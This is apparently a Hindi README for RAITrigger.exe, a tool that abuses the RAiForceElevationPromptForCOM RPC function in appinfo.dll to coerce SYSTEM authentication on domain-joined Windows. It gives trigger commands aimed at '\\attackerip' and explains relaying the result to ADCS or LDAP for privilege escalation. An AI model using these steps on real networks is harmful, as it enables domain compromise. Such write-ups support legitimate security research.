
रिले करने के लिए स्थानीय SYSTEM प्रमाणीकरण ट्रिगर
RPC-फंक्शन appinfo.dll लाइब्रेरी का RAiForceElevationPromptForCOM SYSTEM को मजबूर करने की अनुमति देता है। यह केवल डोमेन से जुड़े सिस्टम पर काम करता है। यह पता चला है कि इस फंक्शन को किसी भी निम्न विशेषाधिकार वाले उपयोगकर्ता द्वारा कॉल किया जा सकता है (प्रक्रिया शुरू करने के लिए नहीं) बल्कि किसी मनमाने स्थान पर SYSTEM प्रमाणीकरण को ट्रिगर करने के लिए। ऐसा इसलिए है क्योंकि CreateFileW को पहले इनपुट पैरामीटर के स्थान पर SYSTEM के रूप में कॉल किया जाता है:
चूंकि निम्न विशेषाधिकार वाला उपयोगकर्ता अभी भी प्रतिरूपित है, इसलिए इसे SEImpersonate से SYSTEM तक विशेषाधिकार बढ़ाने के लिए पोटैटो ट्रिगर के रूप में उपयोग नहीं किया जा सकता है:
लेकिन इसका उपयोग ADCS के विरुद्ध कंप्यूटर खाता प्रमाणपत्र का अनुरोध करने के लिए किया जा सकता है जब आने वाले SMB प्रमाणीकरण के साथ वेब एनरोलमेंट सक्षम हो। या इसका उपयोग LDAP पर रिले करने के साथ LPE के लिए किया जा सकता है - जब LDAP साइनिंग सक्षम न हो।
SMB प्रमाणीकरण ट्रिगर करने के लिए:
[*] RAITrigger.exe \\attackerip\test\test.exe
HTTP प्रमाणीकरण ट्रिगर करने के लिए (WebClient सेवा सक्षम होनी चाहिए):
[*] RAITrigger.exe \\hostname@80\test\test.exe
HTTP प्रमाणीकरण केवल विश्वसनीय इंट्रानेट ज़ोन सिस्टम पर ट्रिगर होता है, इसलिए आपको अपने Kali IP के लिए एक ADIDNS रिकॉर्ड बनाना होगा या उसी सबनेट में होना होगा और उदा. Responder का उपयोग करना होगा। पूर्ण FQDN का उपयोग कभी न करें, केवल होस्टनाम का उपयोग करें।
रिमोट से (स्थानीय व्यवस्थापक के साथ भी) इस फंक्शन को कॉल करने पर rpc_access_denied मिलता है, इसलिए यह उदा. PetitPotam या इसी तरह का कोई विकल्प नहीं है: